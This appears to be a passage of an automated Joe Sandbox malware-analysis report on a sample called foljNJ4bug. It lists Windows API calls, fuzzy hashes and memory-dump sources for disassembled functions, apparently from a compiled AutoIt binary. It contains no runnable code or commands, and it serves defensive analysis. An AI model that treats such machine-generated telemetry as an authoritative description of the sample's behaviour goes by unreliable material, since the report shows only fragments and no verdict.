                                                                                                                                              • Associated: 00000000.00000002.2158014693.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_foljNJ4bug.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock_free
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 3470314060-0
                                                                                                                                              • Opcode ID: 80714434994c9102abdbbcfc383ede657addd51ae4f203e3d2298efcf25a3187
                                                                                                                                              • Instruction ID: d92c7102fc6d098775a0f5363b9b5483e5b10d08a1c29475ed017091780ded1e
                                                                                                                                              • Opcode Fuzzy Hash: 80714434994c9102abdbbcfc383ede657addd51ae4f203e3d2298efcf25a3187
                                                                                                                                              • Instruction Fuzzy Hash: 3301AD32905711ABC721ABA698497DE7BB0AB04724F15416BF950A7381CB3CAAC1CFDD
                                                                                                                                              APIs
                                                                                                                                              • InterlockedExchange.KERNEL32(?,?), ref: 0044B655
                                                                                                                                              • EnterCriticalSection.KERNEL32(?), ref: 0044B666
                                                                                                                                              • TerminateThread.KERNEL32(?,000001F6), ref: 0044B674
                                                                                                                                              • WaitForSingleObject.KERNEL32(?,000003E8,?,000001F6), ref: 0044B682
                                                                                                                                                • Part of subcall function 00432614: CloseHandle.KERNEL32(00000000,00000000,?,0044B68E,00000000,?,000003E8,?,000001F6), ref: 00432622
                                                                                                                                              • InterlockedExchange.KERNEL32(?,000001F6), ref: 0044B697
                                                                                                                                              • LeaveCriticalSection.KERNEL32(?), ref: 0044B69E
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2157892160.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2157879677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157933374.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157949343.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157965076.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2158014693.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_foljNJ4bug.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 3495660284-0
                                                                                                                                              • Opcode ID: 80b6dccbd1e5d9cd8e45b8a26e63ab1859993381d971fdb3943588aa16a91346
                                                                                                                                              • Instruction ID: c0d5b59c8b9084ef0a5212f46b36de0b3fb5a8468090cd03c061fc2099eb7203
                                                                                                                                              • Opcode Fuzzy Hash: 80b6dccbd1e5d9cd8e45b8a26e63ab1859993381d971fdb3943588aa16a91346
                                                                                                                                              • Instruction Fuzzy Hash: A8F0AF72141201BBD210AB64EE8CDAFB77CFF88311F40092AFA0192560CBB4E420CBB6
                                                                                                                                              APIs
                                                                                                                                              • MapVirtualKeyW.USER32(0000005B,00000000), ref: 00410AE8
                                                                                                                                              • MapVirtualKeyW.USER32(00000010,00000000), ref: 00410AF0
                                                                                                                                              • MapVirtualKeyW.USER32(000000A0,00000000), ref: 00410AFB
                                                                                                                                              • MapVirtualKeyW.USER32(000000A1,00000000), ref: 00410B06
                                                                                                                                              • MapVirtualKeyW.USER32(00000011,00000000), ref: 00410B0E
                                                                                                                                              • MapVirtualKeyW.USER32(00000012,00000000), ref: 00410B16
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2157892160.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2157879677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157933374.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157949343.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157965076.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2158014693.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_foljNJ4bug.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Virtual
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 4278518827-0
                                                                                                                                              • Opcode ID: c23d3b718cf4e8061cd741903dec6eccba5b4b0418601ad509713896de31bf0c
                                                                                                                                              • Instruction ID: ec5b0e47a8727e2ef01e8325cfcf1e1c5a721ad9102a6d662b709b351e7b749c
                                                                                                                                              • Opcode Fuzzy Hash: c23d3b718cf4e8061cd741903dec6eccba5b4b0418601ad509713896de31bf0c
                                                                                                                                              • Instruction Fuzzy Hash: 79016770106B88ADD3309F668C84B47FFF8EF95704F01491DD1D507A52C6B5A84CCB69
                                                                                                                                              APIs
                                                                                                                                              • ___set_flsgetvalue.LIBCMT ref: 004151C0
                                                                                                                                                • Part of subcall function 004178AE: TlsGetValue.KERNEL32(?,00417A07,?,004115F6,?,00401BAC,?,?,?), ref: 004178B7
                                                                                                                                                • Part of subcall function 004178AE: TlsSetValue.KERNEL32(00000000,?,004115F6,?,00401BAC,?,?,?), ref: 004178D8
                                                                                                                                              • ___fls_getvalue@4.LIBCMT ref: 004151CB
                                                                                                                                                • Part of subcall function 0041788E: TlsGetValue.KERNEL32(?,?,00413D30,00000000), ref: 0041789C
                                                                                                                                              • ___fls_setvalue@8.LIBCMT ref: 004151DD
                                                                                                                                              • GetLastError.KERNEL32(00000000,?,00000000), ref: 004151E6
                                                                                                                                              • ExitThread.KERNEL32 ref: 004151ED
                                                                                                                                              • __freefls@4.LIBCMT ref: 00415209
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2157892160.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2157879677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157933374.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157949343.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157965076.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2158014693.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_foljNJ4bug.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Value$ErrorExitLastThread___fls_getvalue@4___fls_setvalue@8___set_flsgetvalue__freefls@4
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 442100245-0
                                                                                                                                              • Opcode ID: 3ee415d2c127bcf6c5e710345aa78d19554ad97a0662bc484850007a9fc41a8b
                                                                                                                                              • Instruction ID: 28e435cdead01fd65333368df2891c86ea6a44e569ea48f613a140ff37384f5b
                                                                                                                                              • Opcode Fuzzy Hash: 3ee415d2c127bcf6c5e710345aa78d19554ad97a0662bc484850007a9fc41a8b
                                                                                                                                              • Instruction Fuzzy Hash: FEF01975544700AFC704BF76C54D9CE7BB99F94349720845EB80887222DA3CD8C2C669
                                                                                                                                              APIs
                                                                                                                                                • Part of subcall function 00410160: _wcslen.LIBCMT ref: 00410162
                                                                                                                                                • Part of subcall function 00410160: _wcscpy.LIBCMT ref: 00410182
                                                                                                                                              • GetMenuItemInfoW.USER32(?,00000000), ref: 0045F85C
                                                                                                                                              • _wcslen.LIBCMT ref: 0045F94A
                                                                                                                                              • SetMenuItemInfoW.USER32(00000011,00000000,00000000,?), ref: 0045F9AE
                                                                                                                                                • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                                                                                                              • SetMenuDefaultItem.USER32(00000000,000000FF,00000000,?,00000000), ref: 0045F9CA
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2157892160.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2157879677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157933374.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157949343.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157965076.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2158014693.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_foljNJ4bug.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ItemMenu$Info_wcslen$Default_malloc_wcscpy
                                                                                                                                              • String ID: 0
                                                                                                                                              • API String ID: 621800784-4108050209
                                                                                                                                              • Opcode ID: ba56779765e6f71d67f6246429d0af9e67b9def047912433c0c15b7e926c8fa5
                                                                                                                                              • Instruction ID: 8916cda2fcff4f3da81aa675480f1736598f59ba0f795e6899437ff2d0190f01
                                                                                                                                              • Opcode Fuzzy Hash: ba56779765e6f71d67f6246429d0af9e67b9def047912433c0c15b7e926c8fa5
                                                                                                                                              • Instruction Fuzzy Hash: E061EDB1604301AAD710EF69D885B6B77A4AF99315F04493FF98087292E7BCD84CC79B
                                                                                                                                              APIs
                                                                                                                                                • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                                                                                                                • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                                                                                                              • SetErrorMode.KERNEL32 ref: 004781CE
                                                                                                                                              • SetErrorMode.KERNEL32(00000000,00000001,00000000), ref: 00478387
                                                                                                                                                • Part of subcall function 00433998: GetFileAttributesW.KERNEL32(?), ref: 0043399F
                                                                                                                                              • SetErrorMode.KERNEL32(?), ref: 00478270
                                                                                                                                              • SetErrorMode.KERNEL32(?), ref: 00478340
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2157892160.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2157879677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157933374.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157949343.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157965076.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2158014693.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_foljNJ4bug.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ErrorMode$AttributesFile_memmove_wcslen
                                                                                                                                              • String ID: \VH
                                                                                                                                              • API String ID: 3884216118-234962358
                                                                                                                                              • Opcode ID: 178592a45c440348c39a3b7bd59973aab5981f95bb0f1257baca06643fcd57b5
                                                                                                                                              • Instruction ID: 3f1cdca54a202f1bd1938e87a451cd9606667cca5306a7eaf6ab6c0a6d737147
                                                                                                                                              • Opcode Fuzzy Hash: 178592a45c440348c39a3b7bd59973aab5981f95bb0f1257baca06643fcd57b5
                                                                                                                                              • Instruction Fuzzy Hash: F9619F715043019BC310EF25C585A5BB7E0BFC8708F04896EFA996B392CB76ED45CB96
                                                                                                                                              APIs
                                                                                                                                              • LoadLibraryA.KERNEL32(?), ref: 00434B10
                                                                                                                                              • GetProcAddress.KERNEL32(?,AU3_GetPluginDetails), ref: 00434B88
                                                                                                                                              • FreeLibrary.KERNEL32(?), ref: 00434B9F
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2157892160.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2157879677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157933374.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157949343.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157965076.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2158014693.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_foljNJ4bug.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Library$AddressFreeLoadProc
                                                                                                                                              • String ID: AU3_GetPluginDetails$#v
                                                                                                                                              • API String ID: 145871493-3662034293
                                                                                                                                              • Opcode ID: 525874d34911f66d3e6dd89a42f64d0fb8abb6a055dcd3ee386d4a3c405b38ac
                                                                                                                                              • Instruction ID: fc8523f5daf935d660d2a9c884068eb8da3e2fc1adb06f3317e0194b47a185ca
                                                                                                                                              • Opcode Fuzzy Hash: 525874d34911f66d3e6dd89a42f64d0fb8abb6a055dcd3ee386d4a3c405b38ac
                                                                                                                                              • Instruction Fuzzy Hash: C24107B9600605EFC710DF59D8C0E9AF7A5FF89304B1082AAEA1A8B311D735FD52CB95
                                                                                                                                              APIs
                                                                                                                                              • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00448539
                                                                                                                                              • IsMenu.USER32(?), ref: 0044854D
                                                                                                                                              • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 0044859B
                                                                                                                                              • DrawMenuBar.USER32 ref: 004485AF
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2157892160.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2157879677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157933374.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157949343.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157965076.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2158014693.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_foljNJ4bug.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Menu$Item$DrawInfoInsert
                                                                                                                                              • String ID: 0
                                                                                                                                              • API String ID: 3076010158-4108050209
                                                                                                                                              • Opcode ID: 1799694fe08fa7a149e3e917ddeca428ef12783b8609c92dee7a023332204936
                                                                                                                                              • Instruction ID: 7b58e0297b022ec9ba855d833b0382692745775969200e6848d17b537ef0d45f
                                                                                                                                              • Opcode Fuzzy Hash: 1799694fe08fa7a149e3e917ddeca428ef12783b8609c92dee7a023332204936
                                                                                                                                              • Instruction Fuzzy Hash: 1F417975A00209AFEB10DF55D884B9FB7B5FF59300F14852EE9059B390DB74A845CFA8
                                                                                                                                              APIs
                                                                                                                                                • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                                                                                                                • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                                                                                                              • SendMessageW.USER32(?,00000188,00000000,00000000), ref: 00469D69
                                                                                                                                              • SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 00469D7C
                                                                                                                                              • SendMessageW.USER32(?,00000189,00000000,00000000), ref: 00469DAC
                                                                                                                                                • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                                                                                                                                                • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2157892160.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2157879677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157933374.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157949343.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157965076.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2158014693.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_foljNJ4bug.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: MessageSend$_memmove_wcslen
                                                                                                                                              • String ID: ComboBox$ListBox
                                                                                                                                              • API String ID: 1589278365-1403004172
                                                                                                                                              • Opcode ID: 4395ff4c2c8cdf0c8fa99ec605851f177d12593d5a8a66f2884a0b9051c55526
                                                                                                                                              • Instruction ID: b025c67d46b61e1fa51b41144ded2117d8c1ab71acdc4e5cb50a5164a05e923b
                                                                                                                                              • Opcode Fuzzy Hash: 4395ff4c2c8cdf0c8fa99ec605851f177d12593d5a8a66f2884a0b9051c55526
                                                                                                                                              • Instruction Fuzzy Hash: 8D31287160010477DB10BB69CC45BEF775C9F86324F10852FF918AB2D1DABC9E4583A6
                                                                                                                                              APIs
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2157892160.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2157879677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157933374.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157949343.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157965076.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2158014693.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_foljNJ4bug.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Handle
                                                                                                                                              • String ID: nul
                                                                                                                                              • API String ID: 2519475695-2873401336
                                                                                                                                              • Opcode ID: efdaae6ab43bf4356d88622121a7e42c7f624cc6de1d12637521731ec53ca4c5
                                                                                                                                              • Instruction ID: 058e2060cb23de8d889deff533ab301820a4ae088d702658d54b05e79d5a48de
                                                                                                                                              • Opcode Fuzzy Hash: efdaae6ab43bf4356d88622121a7e42c7f624cc6de1d12637521731ec53ca4c5
                                                                                                                                              • Instruction Fuzzy Hash: 84319571500204ABEB20DF68DC46BEB77A8EF04721F104A4EFD50973D1E7B59A50CBA5
                                                                                                                                              APIs
                                                                                                                                              • GetStdHandle.KERNEL32(000000F6), ref: 0044337D
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2157892160.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2157879677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157933374.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157949343.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157965076.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2158014693.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_foljNJ4bug.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Handle
                                                                                                                                              • String ID: nul
                                                                                                                                              • API String ID: 2519475695-2873401336
                                                                                                                                              • Opcode ID: 97b946d9a765a46b1e85699804a5cf49c651f34dfecb3a2317456e71fe30ed78
                                                                                                                                              • Instruction ID: 7fb8f1e98e57093f7bc771e71f756598ee5282d4f5ffeaa4ddc08f3ab3272662
                                                                                                                                              • Opcode Fuzzy Hash: 97b946d9a765a46b1e85699804a5cf49c651f34dfecb3a2317456e71fe30ed78
                                                                                                                                              • Instruction Fuzzy Hash: 05219331600204ABE720DF689C49FAB77A8EF55731F20474EFDA0972D0EBB59A50C795
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2157892160.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2157879677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157933374.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157949343.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157965076.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2158014693.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_foljNJ4bug.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID: SysAnimate32
                                                                                                                                              • API String ID: 0-1011021900
                                                                                                                                              • Opcode ID: 8caf53187f6e77aecacb49307b2e697766faa1bc511b1160dce697a174d3407c
                                                                                                                                              • Instruction ID: b1a10ecfd0a3fc3d2af2854cd73c9de1262d8b9fd4b2252518a975ef6c54cff1
                                                                                                                                              • Opcode Fuzzy Hash: 8caf53187f6e77aecacb49307b2e697766faa1bc511b1160dce697a174d3407c
                                                                                                                                              • Instruction Fuzzy Hash: 0D21C975600205ABFB149EA9EC81FAB73DCEB95324F20471BF711972C0D279EC518768
                                                                                                                                              APIs
                                                                                                                                                • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                                                                                                                                                • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                                                                                                                                                • Part of subcall function 0043646A: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 00436489
                                                                                                                                                • Part of subcall function 0043646A: GetWindowThreadProcessId.USER32(?,00000000), ref: 0043649C
                                                                                                                                                • Part of subcall function 0043646A: GetCurrentThreadId.KERNEL32 ref: 004364A3
                                                                                                                                                • Part of subcall function 0043646A: AttachThreadInput.USER32(00000000), ref: 004364AA
                                                                                                                                              • GetFocus.USER32 ref: 0046157B
                                                                                                                                                • Part of subcall function 004364B5: GetParent.USER32(?), ref: 004364C3
                                                                                                                                                • Part of subcall function 004364B5: GetParent.USER32(?), ref: 004364CF
                                                                                                                                              • GetClassNameW.USER32(?,?,00000100), ref: 004615C4
                                                                                                                                              • EnumChildWindows.USER32(?,Function_00045B98,?), ref: 004615EF
                                                                                                                                              • __swprintf.LIBCMT ref: 00461608
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2157892160.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2157879677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157933374.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157949343.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157965076.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2158014693.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_foljNJ4bug.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Thread$Parent$AttachChildClassCurrentEnumFocusInputMessageNameProcessSendTimeoutWindowWindows__swprintf_memmove_wcslen
                                                                                                                                              • String ID: %s%d
                                                                                                                                              • API String ID: 2645982514-1110647743
                                                                                                                                              • Opcode ID: 964dbc2a73d3b51658c129c0940897b8911b785c40af9afe88b96a44e5c449bd
                                                                                                                                              • Instruction ID: 8eac61321038dbd32bfe14263504560db7c98c8fbeeeb2eb49a46d34c9d63f73
                                                                                                                                              • Opcode Fuzzy Hash: 964dbc2a73d3b51658c129c0940897b8911b785c40af9afe88b96a44e5c449bd
                                                                                                                                              • Instruction Fuzzy Hash: 272180756007096BD610AF69DC89FAF73A8FB88704F00841FF918A7241DAB8A9418B69
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2157892160.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2157879677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157933374.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157949343.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
